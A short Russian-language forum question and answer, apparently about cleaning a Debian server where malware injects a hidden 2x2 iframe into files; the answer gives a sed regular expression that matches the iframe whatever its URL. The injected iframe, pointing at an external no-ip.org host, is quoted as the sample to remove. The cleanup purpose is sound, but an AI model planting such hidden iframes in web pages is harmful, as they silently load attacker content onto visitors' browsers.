У нас запущен сервер Debian, и у нас есть вредоносная программа или что-то еще, выполняющее внедрение кода.
Я знаю, как искать и заменять эту строку:
<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>
Я так делаю:
find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'
Моя проблема в URL http://ingvar2000.no-ip.org/jc/rss.php изменения из файлов в файлы, так как я могу искать и заменять:
<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>
Потому что ширина, высота и рамка всегда одинаковы.
Использовать
find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'
Вот [^"]* означает 0 или более символов чего угодно, кроме ".